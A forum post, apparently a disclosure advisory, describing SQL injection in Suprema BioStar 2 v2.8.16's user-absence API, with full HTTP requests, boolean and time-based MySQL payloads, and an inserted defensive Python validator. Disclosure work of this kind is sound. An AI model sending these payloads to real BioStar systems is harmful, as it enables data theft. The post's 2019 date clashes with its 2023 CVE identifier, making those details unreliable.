Article CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection

Vander (Staff member), Nov 10, 2019

I have discovered a vulnerability in Suprema's product, BioStar 2 v2.8.16. This vulnerability is classified as SQL Injection. At my request, MITRE assigned this vulnerability the identifier CVE-2023-27167.

Below I provide detailed information about this vulnerability and a security advisory.

The developer of this product, Suprema, has confirmed the vulnerability, released an updated version, and given permission for the publication of this information.

CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection.

Vendor of Product:
  • Suprema
Vulnerability Type:
  • SQL Injection
Affected Product Code Base:
  • Suprema BioStar 2 <= 2.8.16 (affected versions)
Affected Component:
Attack Type:
  • Remote
Attack Vectors:
  • A potential attacker with remote web access to the Suprema BioStar 2 system with minimal privileges can craft a special web request, which in turn will lead to the injection of a SQL query into the database of this application. This will result in the disclosure of confidential information.
Description:
  • The "values" JSON parameter appears to be vulnerable to SQL injection attacks. The payloads "and 3523=03523" and "and 3546=03546" were each submitted in the "values" JSON parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
  • Additionally, the payload "(select*from(select(sleep(11)))a)" was submitted in the "values" JSON parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL.
Evidence:
  • Examples of vulnerable requests and parameters:
    • POST /api/users/absence?search_month=1 HTTP/1.1
    • Host: biostar2.server.net
    • Vulnerable parameter "values" (example):
      • {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Examples of vulnerable request:

#1

Code:
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}

#2

Code:
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Screenshot that shows time-based SQL injection (set 4 – response delays for 8 seconds)

Screenshot that shows time-based SQL injection (set 13 – response delays for 26 seconds)

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09458” means “1 and True”, so we can see information in the response regarding the user with id 1, which is admin)

Screenshot that shows Boolean-based SQL injection (payload “1 and 9458=09453” means “1 and False”, so information regarding the user with id 1, which is admin, is absent from the response)

Screenshots that show an example of exploitation (extracting data from the DB) using the sqlmap tool.
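As an added example (not BioStar 2's own code; the product's back end is not shown on this page), the defensive counterpart to the "values" parameter issue described above, in Python: a validator that rejects any non-integer entry in the `values` array of a `conditions` filter, a log-review helper that flags request bodies carrying such entries, and the parameterized query shape that keeps the values out of the SQL text. The request bodies are constructed from the advisory's evidence; the column allow-list is an assumption.

```python
import json

# Constructed request bodies modelled on the advisory's evidence (not captured traffic):
# a legitimate filter, the boolean-based probe, and the time-based probe.
SAMPLE_BODIES = [
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":[1,4840,20120]}],"orders":[],"total":false}}',
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}',
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}',
]

# Hypothetical allow-list: the filter columns this endpoint accepts and the type each value must have.
ALLOWED_COLUMNS = {"user_group_id.id": int}


def validate_values(body: str) -> list[str]:
    """Return the problems found in the filter's 'values' arrays; an empty list means the filter is clean."""
    problems = []
    query = json.loads(body).get("Query", {})
    for cond in query.get("conditions", []):
        column = cond.get("column")
        if column not in ALLOWED_COLUMNS:
            problems.append(f"unknown column {column!r}")
            continue
        expected = ALLOWED_COLUMNS[column]
        for value in cond.get("values", []):
            # bool is a subclass of int, so reject it explicitly; strings such as the
            # advisory's "1 and 3523=03523" fail the type check and never reach SQL.
            if isinstance(value, bool) or not isinstance(value, expected):
                problems.append(f"{column}: value {value!r} is not {expected.__name__}")
    return problems


def flag_bodies(bodies: list[str]) -> list[int]:
    """Log-review helper: indexes of request bodies whose filter values fail validation."""
    return [i for i, body in enumerate(bodies) if validate_values(body)]


def build_safe_filter(body: str) -> tuple[str, list]:
    """Build a parameterized WHERE fragment; user data goes into params, never into the SQL string."""
    problems = validate_values(body)
    if problems:
        raise ValueError("; ".join(problems))
    clauses, params = [], []
    for cond in json.loads(body)["Query"]["conditions"]:
        placeholders = ", ".join(["%s"] * len(cond["values"]))  # DB-API 'format' paramstyle (MySQL drivers)
        clauses.append(f"{cond['column']} IN ({placeholders})")   # column name comes from the allow-list
        params.extend(cond["values"])
    return " AND ".join(clauses), params
```

The returned fragment and parameter list are meant to be passed to a driver's `cursor.execute(sql, params)`; the two probe bodies are rejected before any query is built.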

Security Recommendations:
Thank you for your attention. The material was prepared specifically for protey.net.
id2746 (Advanced), Dec 17, 2019
Hooray, the forum is finally back up, that's good news!